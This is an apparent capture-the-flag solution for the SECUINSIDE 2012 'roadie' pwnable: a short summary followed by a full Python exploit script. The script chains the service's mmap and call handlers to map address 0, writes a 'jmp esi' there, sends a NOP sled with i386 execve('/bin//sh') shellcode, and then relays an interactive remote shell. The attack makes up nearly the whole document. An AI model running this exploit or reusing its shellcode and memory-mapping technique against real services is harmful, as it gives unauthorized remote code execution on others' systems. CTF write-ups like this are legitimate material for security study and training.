Category : Pwnables
nickname: roadie
HINT: 61.42.25.26:8080
binary: http://61.42.25.26/roadie
Target environment: CentOS 6.2 with randomize_va_space=2 (full ASLR) and exec-shield=1 (NX-style protection) — hence the exploit maps its own page at a fixed address (0) instead of relying on a stack or library address.
Summary: chain the service's request handlers — use the mmap handler to map the page at address 0, write machine code into that page one byte at a time, then use the call handler to jump to address 0. (Mapping the zero page only works where the process is allowed to map below vm.mmap_min_addr; that was presumably the case on the challenge box, since the exploit below reaches a shell.)
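#!/usr/bin/python
"""Exploit for the SECUINSIDE 2012 "roadie" pwnable (32-bit target).

The service consumes fixed-size request records of 0x244 bytes. Two record
shapes are built here, copied from the reverse-engineered layout:

* ``gen_mmap``  - record for the handler that maps memory and lets one
  value be written at a chosen index; sent twice to place ``ff e6``
  (``jmp esi``) at indices 0 and 1, i.e. at addresses 0 and 1.
* ``gen_call``  - record for the handler that calls a function pointer taken
  from the record; pointed at address 0. The record's tail is a NOP sled
  ending in SHELLCODE, so the ``jmp esi`` at address 0 is expected to land
  in that sled (NOTE(review): that ``esi`` points into the request buffer at
  call time is inferred from the original "jmp esi" comment, not verified
  here).

Most dword values are opaque constants from the recovered layout; only the
commented ones are known to matter. Mapping the zero page requires the
target to permit it (``vm.mmap_min_addr``).

Runs under Python 2 and 3: ``python roadie.py [host [port]]``.
"""
from __future__ import print_function

import sys
from socket import *
from struct import pack, unpack   # unpack kept from the original; unused
import time, random               # kept from the original; unused

try:
    input = raw_input  # Python 2: raw_input() is the line-reading prompt
except NameError:
    pass  # Python 3: input() already does that

HOST = "127.0.0.1"   # local test target; the live challenge was 61.42.25.26:8080
PORT = 8383

# i386 execve("/bin//sh") shellcode, preceded by three NOPs (kept verbatim).
SHELLCODE = b"\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"

PAYLOAD_SIZE = 0x244                # one request record, in bytes
PAYLOAD_WORDS = PAYLOAD_SIZE // 4   # 145 little-endian dwords


def d(x):
    """Pack *x* as a little-endian 32-bit word.

    Masks to 32 bits and packs unsigned so that negative values (-1 ->
    ff ff ff ff) and "unsigned" constants such as 0xffffffff or 0xcccccccc
    are both accepted; ``pack('<l', 0xffffffff)`` raises struct.error on
    Python 2.7 and 3 (Python 2.6 only warned). The bytes produced for any
    value in signed range are identical to the original ``'<l'`` packing.
    """
    return pack('<I', x & 0xffffffff)


def w(x):
    """Pack *x* as a little-endian signed 16-bit word (unused by the exploit)."""
    return pack('<h', x)


def b(x):
    """Pack *x* as a single signed byte."""
    return pack('<b', x)


def _assemble(fields):
    """Build one PAYLOAD_SIZE-byte record from ``{dword_index: packed_bytes}``.

    Every dword not named in *fields* is zero. Each value must already be
    packed (via ``d``/``b``) and be exactly four bytes, otherwise later
    indices would shift.

    Raises:
        ValueError: if a field value is not exactly four bytes long.
    """
    words = [d(0)] * PAYLOAD_WORDS
    for index, packed in fields.items():
        if len(packed) != 4:
            raise ValueError("dword %d must be 4 bytes, got %d" % (index, len(packed)))
        words[index] = packed
    return b"".join(words)


def gen_call(idx, addr):
    """Record for the "call" handler: makes the service call *addr*.

    *idx* is the loop/record counter the service seems to track (stored as
    ``idx + 1`` at dword 34, as in the original). Dword 28 holds the function
    pointer. Dword 3 spells ``eb 7f`` (``jmp $+0x7f``) in its low half; every
    other value is copied verbatim from the recovered layout. ``main`` keeps
    only the first 35 dwords of this record and appends a NOP sled plus
    SHELLCODE, so dwords 35..144 (zero here) are never sent.
    """
    fields = {
        0: b(-1) + b(66) + b(66) + b(79),   # record header ("\xffBBO")
        2: d(0),
        3: d(0x00007feb),     # "\xeb\x7f" = jmp $ + 0x7f
        4: d(0x02000200),
        5: d(0x00000100),
        6: d(0x00000100),
        7: d(0x1234001f),     # gen_mmap uses 0x1234001e here; presumably selects the handler
        8: d(0),
        9: d(-1),
        10: d(3),
        11: d(-12),
        12: d(0),
        13: d(-14),
        14: d(0x01090120),
        15: d(0),
        16: d(0x123),
        17: d(0),
        18: d(-1),
        19: d(0x00000101),
        20: d(8),
        21: d(8),
        22: d(-1),
        23: d(0xffff),
        24: d(0xffff0000),
        25: d(0x00b100a1),
        26: d(0x000000c1),
        27: d(0x000000d1),
        28: d(addr),          # function pointer the handler calls
        29: d(0),
        31: d(0xcccccccc),
        32: d(0xdddddddd),
        33: d(0x0),
        34: d(idx + 1),       # index of loop
    }
    return _assemble(fields)


def gen_mmap(idx, idx2, value):
    """Record for the "mmap" handler: write *value* at index *idx2* of the new buffer.

    Per the original author's comments, dword 20 (*idx2*) selects the index in
    the newly mapped buffer to overwrite and dword 30 (*value*) is the value
    written there; ``main`` passes one opcode byte per record. *idx* is the
    loop/record counter, stored as ``idx + 1`` at dword 86. All other dwords
    are opaque constants from the recovered layout.
    """
    fields = {
        0: b(-1) + b(66) + b(66) + b(79),   # record header ("\xffBBO")
        2: d(0x00000000),
        3: d(1234),
        4: d(0x02000200),
        5: d(0x00000100),
        6: d(0x00000100),
        7: d(0x1234001e),     # gen_call uses 0x1234001f here; presumably selects the handler
        8: d(0),
        9: d(-1),
        10: d(3),
        11: d(-12),
        12: d(0),
        13: d(-14),
        14: d(0x01090120),
        15: d(0),
        16: d(0x123),
        17: d(-4),
        18: d(0),
        19: d(0xffffffff),
        20: d(idx2),          # index of new buffer to overwrite
        21: d(0),
        22: d(0x01),
        23: d(0x02),
        24: d(0x03),
        25: d(0x04),
        26: d(0x05),
        27: d(0x06),
        28: d(0x07),
        29: d(0x08),
        30: d(value),         # we can write this value
        39: d(0x33),
        72: d(-40),
        73: d(-24),
        74: d(-23),
        75: d(3),
        76: d(0),
        77: d(0),
        78: d(-126),
        86: d(idx + 1),       # index of loop
    }
    return _assemble(fields)


def main(host=HOST, port=PORT):
    """Run the three-record exploit against host:port, then relay a shell.

    1. Two "mmap" records write ``ff`` and ``e6`` (``jmp esi``) at indices
       0 and 1 of the new buffer.
    2. One "call" record targets address 0; its tail is a NOP sled ending in
       SHELLCODE so the jump has executable payload to land in.
    3. Lines typed at the ``$`` prompt are forwarded to the shell until
       ``exit`` is entered.

    The socket is always closed, even if the target drops the connection.
    """
    sock = socket(AF_INET, SOCK_STREAM)
    try:
        sock.connect((host, port))
        input("gogo?> ")  # pause so a debugger can be attached to the target

        jmp_esi = [0xff, 0xe6]  # jmp esi
        for i, opcode in enumerate(jmp_esi):
            sock.sendall(gen_mmap(i, i, opcode))

        head = gen_call(2, 0x0)[:35 * 4]
        sled = b"\x90" * (PAYLOAD_SIZE - len(head) - len(SHELLCODE))
        sock.sendall(head + sled + SHELLCODE)

        # Got shell. recv(1024) returns whatever has arrived so far, so long
        # outputs may need an extra empty command to drain the remainder.
        while True:
            cmd = input("$ ")
            sock.sendall((cmd + "\n").encode("latin-1"))
            if cmd == "exit":
                break
            print(sock.recv(1024).decode("latin-1"))
    finally:
        sock.close()


if __name__ == "__main__":
    main(sys.argv[1] if len(sys.argv) > 1 else HOST,
         int(sys.argv[2]) if len(sys.argv) > 2 else PORT)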